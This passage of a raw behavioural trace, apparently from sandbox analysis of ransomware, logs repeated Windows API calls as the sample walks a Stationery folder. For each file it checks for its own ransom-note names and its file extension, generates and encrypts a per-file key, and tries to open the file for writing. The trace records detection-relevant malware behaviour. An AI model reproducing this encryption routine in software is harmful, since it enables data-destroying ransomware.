lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53cdfab, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc53cdfab, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45148cd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Sand_Paper.jpg", cAlternateFileName="")) returned 1 [0245.783] lstrcmpiW (lpString1="Sand_Paper.jpg", lpString2="Windows") returned -1 [0245.783] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 76 [0245.783] StrStrIW (lpFirst="Sand_Paper.jpg", lpSrch=".horseleader") returned 0x0 [0245.783] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.783] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="_uninstalling_.png") returned 1 [0245.783] lstrlenW (lpString=".testttjffg") returned 11 [0245.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg", lpSrch=".testttjffg") returned 0x0 [0245.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.784] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5277366, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5277366, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4516ee37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x91c4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Seyes.emf", cAlternateFileName="")) returned 1 [0245.784] lstrcmpiW (lpString1="Seyes.emf", lpString2="Windows") returned -1 [0245.784] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 71 [0245.784] StrStrIW (lpFirst="Seyes.emf", lpSrch=".horseleader") returned 0x0 [0245.784] lstrcmpW (lpString1="Seyes.emf", lpString2="#Decrypt#.txt") returned 1 [0245.784] lstrcmpW (lpString1="Seyes.emf", lpString2="_uninstalling_.png") returned 1 [0245.784] lstrlenW (lpString=".testttjffg") returned 11 [0245.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf", lpSrch=".testttjffg") returned 0x0 [0245.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.785] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce17c0b0, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0245.785] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0245.785] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 80 [0245.785] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".horseleader") returned 0x0 [0245.785] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="#Decrypt#.txt") returned 1 [0245.785] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="_uninstalling_.png") returned 1 [0245.785] lstrlenW (lpString=".testttjffg") returned 11 [0245.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm", lpSrch=".testttjffg") returned 0x0 [0245.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.786] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa58d6e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0245.786] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0245.786] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 78 [0245.786] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".horseleader") returned 0x0 [0245.786] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.786] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0245.786] lstrlenW (lpString=".testttjffg") returned 11 [0245.786] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg", lpSrch=".testttjffg") returned 0x0 [0245.786] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.786] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.788] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc530f8da, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc530f8da, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45194f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13d8c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shorthand.emf", cAlternateFileName="")) returned 1 [0245.788] lstrcmpiW (lpString1="Shorthand.emf", lpString2="Windows") returned -1 [0245.788] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned 75 [0245.788] StrStrIW (lpFirst="Shorthand.emf", lpSrch=".horseleader") returned 0x0 [0245.788] lstrcmpW (lpString1="Shorthand.emf", lpString2="#Decrypt#.txt") returned 1 [0245.788] lstrcmpW (lpString1="Shorthand.emf", lpString2="_uninstalling_.png") returned 1 [0245.788] lstrlenW (lpString=".testttjffg") returned 11 [0245.788] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf", lpSrch=".testttjffg") returned 0x0 [0245.788] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.788] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc541a265, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc541a265, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x451bb0f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Small_News.jpg", cAlternateFileName="")) returned 1 [0245.791] lstrcmpiW (lpString1="Small_News.jpg", lpString2="Windows") returned -1 [0245.791] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned 76 [0245.791] StrStrIW (lpFirst="Small_News.jpg", lpSrch=".horseleader") returned 0x0 [0245.791] lstrcmpW (lpString1="Small_News.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.791] lstrcmpW (lpString1="Small_News.jpg", lpString2="_uninstalling_.png") returned 1 [0245.791] lstrlenW (lpString=".testttjffg") returned 11 [0245.791] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg", lpSrch=".testttjffg") returned 0x0 [0245.791] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.791] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1a220d, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0245.792] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0245.792] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned 75 [0245.792] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".horseleader") returned 0x0 [0245.792] lstrcmpW (lpString1="Soft Blue.htm", lpString2="#Decrypt#.txt") returned 1 [0245.792] lstrcmpW (lpString1="Soft Blue.htm", lpString2="_uninstalling_.png") returned 1 [0245.792] lstrlenW (lpString=".testttjffg") returned 11 [0245.792] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm", lpSrch=".testttjffg") returned 0x0 [0245.792] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.792] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.793] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5b3841, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0245.793] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0245.793] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned 74 [0245.793] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".horseleader") returned 0x0 [0245.794] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.794] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0245.794] lstrlenW (lpString=".testttjffg") returned 11 [0245.794] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg", lpSrch=".testttjffg") returned 0x0 [0245.794] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.794] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1c836a, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0245.795] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0245.795] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned 71 [0245.795] StrStrIW (lpFirst="Stars.htm", lpSrch=".horseleader") returned 0x0 [0245.795] lstrcmpW (lpString1="Stars.htm", lpString2="#Decrypt#.txt") returned 1 [0245.795] lstrcmpW (lpString1="Stars.htm", lpString2="_uninstalling_.png") returned 1 [0245.795] lstrlenW (lpString=".testttjffg") returned 11 [0245.795] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm", lpSrch=".testttjffg") returned 0x0 [0245.795] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.796] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce4037dd, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce4037dd, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0245.796] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0245.796] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned 71 [0245.796] StrStrIW (lpFirst="Stars.jpg", lpSrch=".horseleader") returned 0x0 [0245.796] lstrcmpW (lpString1="Stars.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.796] lstrcmpW (lpString1="Stars.jpg", lpString2="_uninstalling_.png") returned 1 [0245.796] lstrlenW (lpString=".testttjffg") returned 11 [0245.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg", lpSrch=".testttjffg") returned 0x0 [0245.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54403c2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54403c2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x452797c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x748, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stucco.gif", cAlternateFileName="")) returned 1 [0245.797] lstrcmpiW (lpString1="Stucco.gif", lpString2="Windows") returned -1 [0245.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned 72 [0245.798] StrStrIW (lpFirst="Stucco.gif", lpSrch=".horseleader") returned 0x0 [0245.798] lstrcmpW (lpString1="Stucco.gif", lpString2="#Decrypt#.txt") returned 1 [0245.798] lstrcmpW (lpString1="Stucco.gif", lpString2="_uninstalling_.png") returned 1 [0245.798] lstrlenW (lpString=".testttjffg") returned 11 [0245.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif", lpSrch=".testttjffg") returned 0x0 [0245.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc548c67c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc548c67c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4529f927, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Tanspecks.jpg", cAlternateFileName="")) returned 1 [0245.798] lstrcmpiW (lpString1="Tanspecks.jpg", lpString2="Windows") returned -1 [0245.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned 75 [0245.798] StrStrIW (lpFirst="Tanspecks.jpg", lpSrch=".horseleader") returned 0x0 [0245.798] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.799] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="_uninstalling_.png") returned 1 [0245.799] lstrlenW (lpString=".testttjffg") returned 11 [0245.799] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg", lpSrch=".testttjffg") returned 0x0 [0245.799] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.799] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.800] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54b27d9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54b27d9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x121e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Tiki.gif", cAlternateFileName="")) returned 1 [0245.800] lstrcmpiW (lpString1="Tiki.gif", lpString2="Windows") returned -1 [0245.800] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned 70 [0245.800] StrStrIW (lpFirst="Tiki.gif", lpSrch=".horseleader") returned 0x0 [0245.800] lstrcmpW (lpString1="Tiki.gif", lpString2="#Decrypt#.txt") returned 1 [0245.800] lstrcmpW (lpString1="Tiki.gif", lpString2="_uninstalling_.png") returned 1 [0245.800] lstrlenW (lpString=".testttjffg") returned 11 [0245.800] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif", lpSrch=".testttjffg") returned 0x0 [0245.800] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.800] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.800] FindNextFileW (in: 